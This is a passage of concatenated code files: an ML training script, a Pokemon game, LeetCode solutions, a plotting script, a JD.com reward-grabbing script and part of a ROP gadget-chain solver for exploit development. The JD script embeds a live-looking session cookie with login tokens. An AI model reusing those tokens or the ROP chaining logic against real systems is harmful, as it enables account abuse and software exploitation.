Model\n##########################################################################################\n\n# Settings\n#\nlearning_rate = 0.001\nfilter_size = 8\nnum_levels = 3\nnum_fits = 16\n\nfirst = list(ys_train.keys())[0]\n\n# Inputs\n#\nfeatures_cdr3_block = tf.placeholder(tf.float32, [None]+list(xs_train[first]['cdr3'].shape[1:]))\nfeatures_quantity_block = tf.placeholder(tf.float32, [None])\nfeatures_age_block = tf.placeholder(tf.float32)\nweight_block = tf.placeholder(tf.float32)\nlabel_block = tf.placeholder(tf.float32)\nlevel_block = tf.placeholder(tf.int32)\n\n# Format inputs\n#\nfeatures_quantity_block_ = features_quantity_block/tf.reduce_sum(features_quantity_block)\nfeatures_age_block_ = tf.reshape(features_age_block, [1])\nlabels_block = tf.tile(\n tf.reshape(label_block, [1]),\n [ num_fits ]\n)\nweight_block_ = tf.reshape(weight_block, [1])\n\n# Define the model\n#\nmodel = generate_model(xs_train[first]['cdr3'].shape[1:], num_fits, filter_size)\n\n# Run model\n#\nlogits_block = model(\n [\n features_cdr3_block, features_quantity_block_, features_age_block_,\n weight_block_, level_block\n ]\n)\n\nprobabilities_block = tf.math.sigmoid(logits_block)\n\n# Metrics\n#\nerror_block = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits_block, labels=labels_block)\ncosts_block = weight_block_*error_block\n\ncorrects_block = tf.cast(\n tf.equal(\n tf.round(labels_block),\n tf.round(probabilities_block)\n ),\n logits_block.dtype\n)\naccuracies_block = weight_block_*corrects_block\n\n# Aggregate metrics\n#\ncosts = tf.get_variable(\n 'costs', shape=costs_block.get_shape(),\n initializer=tf.constant_initializer(0.0),\n dtype=costs_block.dtype, trainable=False\n)\naccuracies = tf.get_variable(\n 'accuracies', shape=accuracies_block.get_shape(),\n initializer=tf.constant_initializer(0.0),\n dtype=accuracies_block.dtype, trainable=False\n)\n\naccumulate_costs = costs.assign_add(costs_block)\naccumulate_accuracies = accuracies.assign_add(accuracies_block)\n\nreset_costs = costs.assign(tf.zeros_like(costs))\nreset_accuracies = accuracies.assign(tf.zeros_like(accuracies))\n\nindex_bestfit = tf.argmin(costs, axis=0)\n\n# Aggregate gradients\n#\noptimizer = tf.train.AdamOptimizer(learning_rate)\ngrads_params_sample = optimizer.compute_gradients(tf.reduce_sum(costs_block), var_list=tf.trainable_variables())\n\ngrads = [\n tf.Variable(tf.zeros_like(param.initialized_value()), dtype=param.initialized_value().dtype, trainable=False) \\\n for grad, param in grads_params_sample\n]\n\naccumulate_gradients = tf.group(*[\n grads[index].assign_add(grad) for index, (grad, param) in enumerate(grads_params_sample)\n])\nreset_gradients = tf.group(*[\n grad.assign(tf.zeros_like(grad)) for grad in grads\n])\n\napply_gradients = optimizer.apply_gradients([\n (grads[index], param) for index, (grad, param) in enumerate(grads_params_sample)\n])\n\n# Create operator to initialize session\n#\ninitializer = tf.global_variables_initializer()\n\n##########################################################################################\n# Session\n##########################################################################################\n\n# Settings\n#\nnum_epochs = 128\ncutoff = 131072\n\n# Open session\n#\nwith tf.Session() as session:\n\n # Initialize variables\n #\n session.run(initializer)\n\n # Initialize the model\n #\n for level_ in range(0, num_levels):\n for sample in ys_train.keys():\n session.run(\n probabilities_block,\n feed_dict={\n features_cdr3_block: xs_train[sample]['cdr3'][:cutoff],\n 
features_quantity_block: xs_train[sample]['quantity'][:cutoff],\n features_age_block: xs_train[sample]['age'],\n weight_block: ws_train[sample],\n level_block: level_\n }\n ) \n\n # Each iteration represents one batch\n #\n for epoch in range(0, num_epochs):\n\n # Train the model\n #\n session.run((reset_costs, reset_accuracies, reset_gradients))\n for sample in ys_train.keys():\n session.run(\n (accumulate_costs, accumulate_accuracies, accumulate_gradients),\n feed_dict={\n features_cdr3_block: xs_train[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_train[sample]['quantity'][:cutoff],\n features_age_block: xs_train[sample]['age'],\n label_block: ys_train[sample],\n weight_block: ws_train[sample],\n level_block: num_levels\n }\n )\n cs_train, as_train, i_bestfit = session.run((costs, accuracies, index_bestfit))\n\n # Validate the model\n #\n session.run((reset_costs, reset_accuracies))\n for sample in ys_val.keys():\n session.run(\n (accumulate_costs, accumulate_accuracies),\n feed_dict={\n features_cdr3_block: xs_val[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_val[sample]['quantity'][:cutoff],\n features_age_block: xs_val[sample]['age'],\n label_block: ys_val[sample],\n weight_block: ws_val[sample],\n level_block: num_levels\n }\n )\n cs_val, as_val = session.run((costs, accuracies))\n\n # Update the parameters\n #\n session.run(apply_gradients)\n\n # Print report\n #\n print(\n epoch,\n np.mean(cs_train)/np.log(2.0),\n 100.0*np.mean(as_train),\n np.mean(cs_val)/np.log(2.0),\n 100.0*np.mean(as_val),\n i_bestfit,\n cs_train[i_bestfit]/np.log(2.0),\n 100.0*as_train[i_bestfit],\n cs_val[i_bestfit]/np.log(2.0),\n 100.0*as_val[i_bestfit],\n sep='\\t', flush=True\n )\n\n # Save the predictions on training data\n #\n with open(args.output+'_ps_train.csv', 'w') as stream:\n print('Sample', 'Weight', 'Label', ','.join([ 'Prediction_'+str(i) for i in range(num_fits) ]), sep=',', file=stream)\n for sample, y in ys_train.items():\n ps = session.run(\n probabilities_block,\n feed_dict={\n features_cdr3_block: xs_train[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_train[sample]['quantity'][:cutoff],\n features_age_block: xs_train[sample]['age'],\n weight_block: ws_train[sample],\n level_block: num_levels\n }\n )\n print(sample, ws_train[sample], y, ','.join([ str(ps[i]) for i in range(num_fits) ]), sep=',', file=stream)\n\n # Save the predictions on validation data\n #\n with open(args.output+'_ps_val.csv', 'w') as stream:\n print('Sample', 'Weight', 'Label', ','.join([ 'Prediction_'+str(i) for i in range(num_fits) ]), sep=',', file=stream)\n for sample, y in ys_val.items():\n ps = session.run(\n probabilities_block,\n feed_dict={\n features_cdr3_block: xs_val[sample]['cdr3'][:cutoff],\n features_quantity_block: xs_val[sample]['quantity'][:cutoff],\n features_age_block: xs_val[sample]['age'],\n weight_block: ws_val[sample],\n level_block: num_levels\n }\n )\n print(sample, ws_val[sample], y, ','.join([ str(ps[i]) for i in range(num_fits) ]), sep=',', file=stream)\n\n # Save the parameters\n #\n model.save_weights(args.output)\n\n","sub_path":"repertoire-classification-problem/model/comparisons/dkm-2sequences-8steps/train_val.py","file_name":"train_val.py","file_ext":"py","file_size_in_byte":9820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"62931519","text":"from tkinter import *\nimport random\nclass Pokemon:\n health = 100\n\n def __init__(self,_name,_type,_moves,_speed):\n self.name=_name\n self.type=_type\n 
self.moves=_moves\n self.speed=_speed\n def damage(self,amount):\n if amount > self.health:\n self.health = 0\n else:\n self.health -= amount\npikachuMoves = ('Thunder','Quick Attack','Slam','Lightning')\ngoldeenMoves = ('Bubblebeam','Tackle','Slam','Surf')\nmoveInfo = [('Thunder','Electric',30,75),\n ('Quick Attack', 'Normal', 10, 100),\n ('Slam','Normal',70,50),\n ('Lightning', 'Electric',60,60),\n ('Bubblebeam','Water',60,60),\n ('Tackle','Normal',25,75),\n ('Surf','Water',20,90)]\nplayer = Pokemon('Pikachu','Electric',pikachuMoves,50)\ncomputer = Pokemon('Goldeen','Water',goldeenMoves,20)\ndef getmoveinfo(movename):\n for move in moveInfo:\n if movename == move[0]:\n return move\ndef printMoves(movesarray):\n for i in range(4):\n info = getmoveinfo(movesarray[i])\n string = 'Move #' + str(i+1) + ') '\n string += 'Name: ' + info[0] + ', '\n string += 'Type: ' + str(info[1]) + ', '\n string += 'Damage: ' + str(info[2]) + ', '\n string += 'Accuracy: ' + str(info[3])\n print(string)\ndef effectiveness(aType,dType):\n if aType == 'Electric' and dType == 'Water': \n return 2.0\n if aType == 'Water' and dType == 'Electric':\n return 0.5\n return 1.0\ndef attack(a,d,mi):\n print(a.name,'uses',mi[0])\n multiplier = effectiveness(mi[1],d.type)\n totaldamage = int(multiplier*mi[2])\n randomNum = random.randint(1,100)\n if mi[3] >= randomNum:\n print(a.name, 'has hit', d.name, 'with', mi[0])\n print(d.name,'is dealt', totaldamage,'damage')\n d.damage(totaldamage)\n else:\n print(mi[0] + ' missed!')\nprint('Welcome to Pokemon Arena')\nprint('Your Pokemon is',player.name)\nprint('Your opponent\\'s Pokemon is', computer.name)\nprint(player.name, 'has the following moves:')\nprintMoves(player.moves)\nprint(computer.name, 'has the following moves:')\nprintMoves(computer.moves) \nwhile(player.health != 0 and computer.health != 0):\n num1 = input('Please select a move by typing 1,2,3,4: ')\n num = int(num1)\n usermove = player.moves[num-1] #move 1 is moves 0\n moveinfo = getmoveinfo(usermove)\n compmove = random.choice(computer.moves)\n compmoveinfo = getmoveinfo(compmove)\n if player.speed > computer.speed:\n if computer.health > 0:\n attack(computer,player,compmoveinfo)\n else:\n attack(computer,player,compmoveinfo)\n if player.health > 0:\n attack(player,computer,compmoveinfo)\n print(player.name, 'has a remaining health of', player.health)\n print(computer.name, 'has a remaining health of', computer.health)\n if player.health == 0:\n print(player.name,\"fainted, you lose!\")\n if computer.health == 0:\n print(computer.name,'fainted, you win!')\n \n\n","sub_path":"Python - Advanced/Youwen - Lesson 9.py","file_name":"Youwen - Lesson 9.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"429811631","text":"\"\"\"\r\n# Definition for Employee.\r\nclass Employee:\r\n def __init__(self, id: int, importance: int, subordinates: List[int]):\r\n self.id = id\r\n self.importance = importance\r\n self.subordinates = subordinates\r\n\"\"\"\r\nfrom collections import deque\r\nclass Solution:\r\n \"\"\"DFS Implementation\r\n Time complexity-O(n)\r\n Space Complexity-O(n)\"\"\"\r\n def __init__(self):\r\n self.result=0\r\n self.mapfunc={}\r\n def getImportance(self, employees: List['Employee'], id: int) -> int:\r\n if not employees:\r\n return 0\r\n for i in employees:\r\n self.mapfunc[i.id]=i\r\n self.dfs(id)\r\n return self.result\r\n \r\n def dfs(self, i):\r\n if not i in self.mapfunc:\r\n return 0\r\n 
self.result+=self.mapfunc[i].importance\r\n children=self.mapfunc[i].subordinates\r\n if children:\r\n for j in children:\r\n self.dfs(j)\r\n \r\n \r\n \"\"\"BFS Implementation\r\n Time complexity-O(n)i.e. V+E\r\n Space Complexity-O(n)\"\"\"\r\n # def getImportance(self, employees: List['Employee'], id: int) -> int:\r\n # result=0\r\n # q=deque()\r\n # mapfunc={}\r\n # for i in employees:\r\n # mapfunc[i.id]=i\r\n # for i in mapfunc:\r\n # if i==id:\r\n # q.append(i)\r\n # while q:\r\n # size=len(q)\r\n # for i in range(size):\r\n # curr=q.popleft()\r\n # result+=mapfunc[curr].importance\r\n # children=mapfunc[curr].subordinates\r\n # if children:\r\n # for j in children:\r\n # q.append(j)\r\n # return result\r\n \r\n \r\n ","sub_path":"Employee_Importance.py","file_name":"Employee_Importance.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"558539332","text":"class Solution:\n def licenseKeyFormatting(self, S, K):\n \"\"\"\n :type S: str\n :type K: int\n :rtype: str\n \"\"\"\n S = list(S)\n i = 0\n len_chars = 0\n while i < len(S):\n if S[i] != \"-\":\n len_chars += 1\n i += 1\n\n mod_val = len_chars % K\n num_dashes_needed = len_chars // K\n tot_str_len = len_chars + num_dashes_needed + mod_val\n while len(S) < tot_str_len:\n S.append(\"-\")\n\n return \"\".join(S)\nsol = Solution()\nprint(sol.licenseKeyFormatting(\"abcd\", 1))","sub_path":"python/482. License Key Formatting.py","file_name":"482. License Key Formatting.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"378007083","text":"import requests\nimport time\nimport datetime\nimport sys\nimport json\nfrom datetime import datetime\n\ndef exchange():\n t = time.time()\n microsecond = int(round(t * 1000))\n # activeDate = time.strftime(\"%Y%#m%d\", time.localtime())\n\n now = datetime.now()\n year = str(int(now.strftime('%Y')))\n month = str(int(now.strftime('%m')))\n day = str(now.strftime('%d'))\n activeDate = year + '' + month + '' + day\n\n \"\"\"\n 替换\n \"\"\"\n headers = {\n 'authority': 'wq.jd.com',\n 'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Mobile Safari/537.36',\n 'accept': '*/*',\n 'sec-fetch-site': 'same-site',\n 'sec-fetch-mode': 'no-cors',\n 'sec-fetch-dest': 'script',\n 'referer': 'https://wqs.jd.com/pglive/task/index.html?sceneval=2',\n 'accept-language': 'zh-CN,zh;q=0.9',\n 'cookie': 'wxa_level=1; webp=1; block_call_jdapp=11; sc_width=1920; __jdv=122270672%7Cbaidu%7C-%7Corganic%7Cnot%20set%7C1587518294267; wq_area=19_1607_4773%7C3; visitkey=28627513144879948; shshshfpa=f332fdcd-560b-5bf8-3c9c-9677b27ae4dc-1587518295; shshshfpb=cGa6CPa3nfOg4kZFPlxG7dg%3D%3D; retina=1; TrackerID=MRD4qz0xN_u4iyYh57criOB8RYViUMbilLbqHS-4SuSuZZt_Kgfbt2xCFiPLQs166V_pjsOIH-T9I59R8GM31wbjswcGtoPWdaXPtZ6T_0cTKfT73tYYU2gwVa3FpIHcHQ0Y44b-riLPOEypZgtgrw; pt_key=AAJen56gADB36nGmzYAiSsxxG7Sr8eynyZLVnz4lvzMMHGrhaaUQ-MW4YaHzpM1jVBoHaTAWmGU; pt_pin=jd_RmVTvMkeKfWf; pt_token=oycwt392; pwdt_id=jd_RmVTvMkeKfWf; cid=9; shshshfp=d54b79c8c57595c77d64b2e240e58999; PPRD_P=CT.138631.36.18; wqmnx1=MDEyNjM4Ni8uaS90ZTIxOC9ucjs1TUFLM0xHaC4xbGkxc2Y0MkVIJlI%3D; __wga=1587519170074.1587518294262.1587518294262.1587518294262.6.1; shshshsID=d95841118172c6fbf1f8021ff08af228_8_1587519170368; promotejs=ca244ad51eb358e5fc19cf82b02e233218WQ',\n }\n\n params = (\n ('active', 'zhiboduihuanhb' + 
activeDate),\n ('level', '1'), # 1 20元红包、2 10元红包、3 5元红包、4 2元红包、5 1元红包\n ('platform', '4'),\n ('_', microsecond),\n ('sceneval', '2'),\n ('g_login_type', '1'),\n ('callback', 'jsonpCBKL'),\n ('g_ty', 'ls'),\n )\n \n response = requests.get('https://wq.jd.com/jxlivetask/DrawAward', headers=headers, params=params)\n localtime = time.asctime( time.localtime(time.time()) )\n\n # 根据返回结果处理\n resultText = response.text.replace('jsonpCBKL(', '')\n resultText = resultText.replace(')', '')\n resultText = resultText.replace(';', '')\n resultTextJson = json.loads(resultText)\n if resultTextJson['msg'] == 'success':\n print(localtime, '兑换成功!')\n exit()\n\n print(localtime, '兑换结果:', response.text)\n\ndef cycle():\n \"\"\"\n 循环调用\n 如果当前时间大于整点+30秒的时候 continue\n \"\"\"\n while True:\n currentTimestamp = int(time.time())\n hourTimestampFormat = time.strftime(\"%Y-%m-%d 00:00:00\", time.localtime())\n hourTimestampArray = time.strptime(hourTimestampFormat, \"%Y-%m-%d %H:%M:%S\")\n hourTimestamp = int(time.mktime(hourTimestampArray))\n hourTimestampPlus30 = int(time.mktime(hourTimestampArray) + 30)\n\n # 开始时间点\n startLoopPoint = time.strftime(\"%Y-%m-%d 23:59:55\", time.localtime())\n startLoopPointArray = time.strptime(startLoopPoint, \"%Y-%m-%d %H:%M:%S\")\n startLoopPointTimestamp = int(time.mktime(startLoopPointArray))\n # print(startLoopPointTimestamp)\n # 当前时间在 T 23:59:55 --- T+1 00:00:30 之间\n if (currentTimestamp > startLoopPointTimestamp and currentTimestamp <= (startLoopPointTimestamp + 5)) or (currentTimestamp >= hourTimestamp and currentTimestamp < hourTimestampPlus30):\n exchange()\n time.sleep(1)\n\ndef main():\n # 调用\n cycle()\n \nif __name__ == \"__main__\":\n main()\n#NB. Original query string below. It seems impossible to parse and\n#reproduce query strings 100% accurately so the one below is given\n#in case the reproduced version is not \"correct\".\n# response = requests.get('https://wq.jd.com/jxlivetask/DrawAward?active=zhiboduihuanhb2020412&level=1&platform=4&_=1586652179175&sceneval=2&g_login_type=1&callback=jsonpCBKM&g_ty=ls', headers=headers, cookies=cookies)\n","sub_path":"zhibo_coin_20_bro.py","file_name":"zhibo_coin_20_bro.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"337114089","text":"#!\"C:/Program Files/Python37/python\"\nfrom matplotlib import pyplot\nfrom openpyxl import load_workbook\n\ndef getvalue(x):\n return x.value\n\nwb = load_workbook('data_analysis_lab.xlsx')\nws = wb['Data']\n\nex_Year = list(map(getvalue, ws['A'][1:]))\nex_Temp = list(map(getvalue, ws['B'][1:]))\nex_RelTemp = list(map(getvalue, ws['C'][1:]))\nex_Activity = list(map(getvalue, ws['D'][1:]))\n\npyplot.plot(ex_Year, ex_Temp)\npyplot.plot(ex_Year, ex_RelTemp)\npyplot.plot(ex_Year, ex_Activity)\n\npyplot.xlabel('Год')\npyplot.xlabel('Значение')\npyplot.legend(['Температура (C)', 'Относительная температура (C)', 'Солнечная активность'])\n\nprint('script started')\npyplot.show()\nprint('script finished')\n","sub_path":"Lab1.2/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"285260522","text":"from djpcms.html.classes import button_holder, button\r\nform = 'uniForm'\r\ninline = 'inline'\r\ninlineLabels = 'inlineLabels'\r\ninlineLabels2 = 'inlineLabels fullwidth'\r\ninlineLabels3 = 'inlineLabels auto'\r\nblockLabels = 'blockLabels'\r\ninlineFormsets = 
'blockLabels2'\r\nnolabel = 'nolabel'\r\nlegend = 'legend'\r\nctrlHolder = 'ctrlHolder'\r\ncontrol = 'control'\r\nrequired = 'required'\r\nlabel = 'label'\r\nui_input = 'ui-input'\r\nalign_right = 'align-right'\r\nalign_middle = 'align-middle'\r\nlayout_block = 'layout-element'\r\ndelete_row = 'delete-row'\r\nnumber_of_forms = 'number-of-forms'","sub_path":"djpcms/forms/layout/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170926625","text":"# cook your dish here\n#code_uncode create room\n#asik 11-03-2021\na,b,c=map(int,input().strip().split())\nbox1=list(map(int,input().strip().split()))[:a]\nbox2=list(map(int,input().strip().split()))[:b]\n\nbox1=sorted(box1)\n\nbox2=sorted(box2)\n\nprothom=0\n\nditio=0\n\ngonona=0\n\nwhile(prothom Trying to move %s to %s\" % (src, dst))\n # Direct move\n for g in mov_gadget_dict['register_move']:\n if g.instructions[0].src == src and g.instructions[0].dst == dst:\n print(\"-> Register Move: %s to %s\" % (src, dst))\n print(g)\n if not search_regmov_conflict(payload_insn, g):\n return True\n\n # Chained move\n index = 0\n movchain = []\n for g in mov_gadget_dict['register_move']:\n if g.instructions[0].src == src:\n if not search_regmov_conflict(payload_insn, g):\n movchain.append(src)\n while movchain.count(src) < 2:\n for tmp in mov_gadget_dict['register_move']:\n if tmp.instructions[0].src == movchain[index]:\n if not search_regmov_conflict(payload_insn, tmp):\n movchain.append(tmp.instructions[0].dst)\n index += 1\n for m in movchain:\n print(m)\n\n return False\n\n\ndef is_supported(payload_insn):\n \"\"\" Check if a given payload instruction is supported \"\"\"\n if payload_insn.mnemonic in OPCODES.values():\n return True\n print(colored(\"Not supported\", \"red\"))\n return False\n\n\ndef check_gadget_validity(g, controlled_regs):\n \"\"\"\n Checks a set of rules on a given gadget, returns True if all are passed\n False otherwise.\n \"\"\"\n gadget_src = g.instructions[0].src\n gadget_dst = g.instructions[0].dst\n if gadget_src == 'esp' or\\\n gadget_dst == 'esp' or\\\n g.instructions[len(g.instructions)-1].label != 'ret;':\n return False\n for i in g.instructions[1:]:\n if i.mnemonic == 'CALL' or\\\n i.mnemonic == 'LEAVE' or\\\n i.mnemonic == 'MOV r/m32,r32' and i.dst == gadget_dst or\\\n i.dst == 'esp':\n return False\n return True\n\n\ndef search_regmov_conflict(payload_insn, target_gadget):\n \"\"\"\n Search for a conflicting register move between a given instruction and a\n target gadget.\n\n Args:\n payload_insn: payload instruction used to check for possible conflicts\n\n target_gadget: potential Gadget found in the binary\n\n Returns:\n True if a conflict has been found, False otherwise.\n \"\"\"\n if payload_insn.label.find('ptr') == -1:\n unavailable_regs = []\n else:\n unavailable_regs = [payload_insn.src, payload_insn.dst]\n\n if target_gadget.instructions[0].src == payload_insn.dst:\n unavailable_regs.append(target_gadget.instructions[0].dst)\n if payload_insn.dst in unavailable_regs:\n unavailable_regs.remove(payload_insn.dst)\n\n for i in target_gadget.instructions[1:]:\n if i.dst in unavailable_regs:\n print(\"Conflicting instructions during mov sequence\")\n print(colored(\"Conflict on: \" + i.dst, 'red'))\n print(target_gadget)\n return True\n\n return False\n\n\ndef map_possible_movements(move_type, gagdgets_lists):\n \"\"\"\n Each register is associated with 3 lists mapping the possible\n 
Register to register move:\n    - direct: list for direct moves (ex: mov eax, ebx)\n    - chained: list with chained moves 1...n\n    (ex: mov ecx, eax is not available directly, instead we have a chain:\n    mov edx, eax --> mov ecx, edx).\n    \"\"\"\n    move_mapping = {}\n    for reg in reglist:\n        move_mapping[reg] = {'direct': [], 'chained': [], 'missing': []}\n\n    if move_type == 'register_move':\n        for reg in move_mapping.keys():\n            # Find the direct mov possibilities in the Reg-to-Reg gadget list.\n            for g in gadgets_lists['register_move']:\n                src = g.instructions[0].src\n                dst = g.instructions[0].dst\n                if src == reg and dst not in move_mapping[reg][\"direct\"]:\n                    move_mapping[reg][\"direct\"].append(dst)\n\n            # Find the possible chains within the direct mov list (length 2).\n            for g in gadgets_lists['register_move']:\n                src = g.instructions[0].src\n                dst = g.instructions[0].dst\n                for m in move_mapping[reg][\"direct\"]:\n                    if src == m and \\\n                       dst not in move_mapping[reg][\"direct\"] and \\\n                       dst not in move_mapping[reg][\"chained\"]:\n                        move_mapping[reg][\"chained\"].append(dst)\n\n            # Find the possible chains within the 2-chain mov list (length 3+).\n            for g in gadgets_lists['register_move']:\n                src = g.instructions[0].src\n                dst = g.instructions[0].dst\n                for m in move_mapping[reg][\"chained\"]:\n                    if src == m and \\\n                       dst not in move_mapping[reg][\"direct\"] and \\\n                       dst not in move_mapping[reg][\"chained\"]:\n                        move_mapping[reg][\"chained\"].append(dst)\n\n            # Append the destinations unreachable from reg to its missing list\n            # (must run once per register, inside the loop over registers).\n            for k in move_mapping.keys():\n                if k not in move_mapping[reg][\"direct\"] and \\\n                   k not in move_mapping[reg][\"chained\"]:\n                    move_mapping[reg][\"missing\"].append(k)\n    else:\n        for reg in move_mapping.keys():\n            for g in gadgets_lists[move_type]:\n                dst = g.instructions[0].dst\n                src = g.instructions[0].src\n                if src == reg and dst not in move_mapping[reg][\"direct\"]:\n                    move_mapping[reg][\"direct\"].append(dst)\n\n            # Append the destinations unreachable from reg to its missing list.\n            for k in move_mapping.keys():\n                if k not in move_mapping[reg][\"direct\"]:\n                    move_mapping[reg][\"missing\"].append(k)\n\n    return move_mapping\n\n\ndef is_movable(src, dst, payload_insn, regmove_glist, move_mapping,\n               gadget_chain, visited=[]):\n    \"\"\"\n    Checks if a non-conflicting (i.e., side-effect free) register move chain\n    can be found to transfer a given src register to a target one. If so, the\n    corresponding gadget(s) are appended to the gadget chain passed as a parameter.\n\n    Args:\n        src: String representing the source register\n\n        dst: String representing the target register\n\n        payload_insn: target payload Instruction\n\n        regmove_glist: List of register move gadgets\n\n        move_mapping: Dict containing Lists of register movements in the\n        current context (direct, chained or missing)\n\n    Returns:\n        True if a move chain is found, False otherwise\n    \"\"\"\n    if src not in ['eax', 'ebx', 'ecx', 'edx', 'ebp', 'esp', 'edi', 'esi']:\n        debug(\"Constant\")\n        for pg in pop_gadgets:\n            debug(pg)\n            if pg.instructions[0].dst == dst:\n                gadget_chain.append(pg)\n                return True\n        return False\n\n    if dst not in ['eax', 'ebx', 'ecx', 'edx', 'ebp', 'esp', 'edi', 'esi']:\n        debug(\"Constant\")\n        for pg in pop_gadgets:\n            debug(pg)\n            if pg.instructions[0].dst == src:\n                gadget_chain.append(pg)\n                return True\n        return False\n\n    debug(\"Visited regs: %s\" % colored(' '.join(str(r) for r in visited),\n                                       'cyan'))\n\n    for reg in move_mapping[src]['direct']:\n        if reg == dst and reg != src:\n            for g in regmove_glist:\n                if g.instructions[0].src == src and\\\n                   g.instructions[0].dst == reg:\n                    debug(\"Move %s to %s\" % (src, reg))\n                    debug(g)\n                    if not search_regmov_conflict(payload_insn, g):\n                        gadget_chain.append(g)\n                        return True\n\n    for reg in move_mapping[src]['direct']:\n        if reg not in visited and reg != src:\n            visited.append(reg)\n            debug(\"Move %s to %s\" % (src, reg))\n            for g in regmove_glist:\n                if g.instructions[0].src == src and\\\n                   g.instructions[0].dst == reg:\n                    if not search_regmov_conflict(payload_insn, g):\n                        debug(g)\n                        gadget_chain.append(g)\n                        return is_movable(reg, dst, payload_insn,\n                                          regmove_glist, move_mapping,\n                                          gadget_chain, visited)\n    return False\n\n\ndef solve_chain(chain_type, payload_insn, mov_gadget_dict, move_mapping):\n    \"\"\"\n    Tries to find a side-effect free gadget chain that matches a given payload\n    instruction.\n\n    Args:\n        chain_type: String representing the type of chain searched\n        (register_move, memory_read, memory_write)\n\n        payload_insn: target payload Instruction\n\n        mov_gadget_dict: Dict containing Lists of all gadgets found for\n        each type of MOV instruction.\n\n        move_mapping: Dict containing Lists of register movements in the\n        current context (direct, chained or missing)\n\n    Returns:\n        List of gadgets constituting the chain, None if none is found.\n    \"\"\"\n\n    gadget_chain = []\n\n    if payload_insn.label.find('ptr') == -1:\n        debug(\"Case 0: register move\")\n        if is_movable(payload_insn.src, payload_insn.dst, payload_insn,\n                      mov_gadget_dict['register_move'], move_mapping,\n                      gadget_chain,\n                      visited=[]):\n            debug(colored(\"✓ Chain found\", 'green'))\n            return gadget_chain\n    else:\n        # Case 1\n        for g in mov_gadget_dict[chain_type]:\n            if g.instructions[0].dst == payload_insn.dst and \\\n               g.instructions[0].src == payload_insn.src:\n                gadget_chain.append(g)\n                debug(\"Case 1: same src same dst\")\n                debug(g)\n                debug(colored(\"✓ Chain found\", 'green'))\n                return gadget_chain\n        # Case 2\n        for g in mov_gadget_dict[chain_type]:\n            if g.instructions[0].dst == payload_insn.dst and \\\n               g.instructions[0].src != payload_insn.src:\n                debug(\"Case 2: same dst, diff src\")\n                debug(\"Target gadget:\")\n                debug(g)\n                debug(\"Objective: mov %s to %s\" % (payload_insn.src,\n                                                   g.instructions[0].src))\n                if is_movable(payload_insn.src, g.instructions[0].src,\n                              payload_insn,\n                              mov_gadget_dict['register_move'],\n                              move_mapping,\n                              gadget_chain,\n                              visited=[]):\n                    gadget_chain.append(g)\n                    debug(colored(\"✓ Chain found\", 'green'))\n                    return gadget_chain\n        # Case 3\n        for g in mov_gadget_dict[chain_type]:\n            if g.instructions[0].dst != payload_insn.dst and \\\n               g.instructions[0].src == payload_insn.src:\n                debug(\"Case 3: diff dst, same src\")\n                debug(\"Target gadget:\")\n                debug(g)\n                debug(\"Objective: mov %s to %s\" % (payload_insn.dst,\n                                                   g.instructions[0].dst))\n                if is_movable(payload_insn.dst, g.instructions[0].dst,\n                              payload_insn,\n                              mov_gadget_dict['register_move'],\n                              move_mapping,\n                              gadget_chain,\n                              visited=[]):\n                    gadget_chain.append(g)\n                    debug(colored(\"✓ Chain found\", 'green'))\n                    return gadget_chain\n        # Case 4\n        for g in mov_gadget_dict[chain_type]:\n            if g.instructions[0].dst != payload_insn.dst and \\\n               g.instructions[0].src != payload_insn.src:\n                debug(\"Case 4: diff dst, diff src\")\n                debug(\"Target gadget:\")\n                debug(g)\n                debug(\"Objective 1: mov %s to %s\" % (payload_insn.dst,\n                                                     g.instructions[0].dst))\n                if is_movable(payload_insn.dst, g.instructions[0].dst,\n                              payload_insn,\n                              mov_gadget_dict['register_move'],\n                              move_mapping,\n                              gadget_chain,\n                              visited=[]):\n                    debug(\"Objective 2: mov %s to %s\" % (payload_insn.src,\n                                                         g.instructions[0].src))\n                    if is_movable(payload_insn.src, g.instructions[0].src,\n                                  payload_insn,\n                                  mov_gadget_dict['register_move'],\n                                  move_mapping,\n                                  gadget_chain,\n                                  visited=[]):\n                        gadget_chain.append(g)\n                        debug(colored(\"✓ Chain found\", 'green'))\n                        return gadget_chain\n    return\n\n\ndef find_chain(payload_insn, mov_gadget_dict, move_mapping):\n    \"\"\"\n    Search in a dictionary of MOV gadgets for a gadget (or gadget chain) that\n    matches a given payload instruction.\n\n    Args:\n        payload_insn: target payload Instruction.\n\n        mov_gadget_dict: Dict containing lists of the different MOV gadgets\n        available.\n\n        move_mapping: Dict representing the possible movements.\n\n    Returns:\n        An ordered list of gadgets constituting the chain.\n    \"\"\"\n    gadget_chain = []\n\n    if payload_insn.mnemonic in ['MOV r/m32,r32', 'MOV r/m32,imm32',\n                                 'MOV imm32,r32']:\n        gadget_chain = solve_chain('memory_write', payload_insn,\n                                   mov_gadget_dict, move_mapping)\n\n    if payload_insn.mnemonic in ['MOV r32,r/m32', 'MOV r32,imm32']:\n        gadget_chain = solve_chain('memory_read', payload_insn,\n                                   mov_gadget_dict, move_mapping)\n\n    if not gadget_chain:\n        debug(\"%s\\n\" % colored(\"✘ Chain not found\", 'red'))\n\n    return gadget_chain\n\n\ndef print_rule_validation(glist):\n    \"\"\" Prints the rule check detail for every gadget in a list \"\"\"\n    def _check_ruleset(g):\n        if 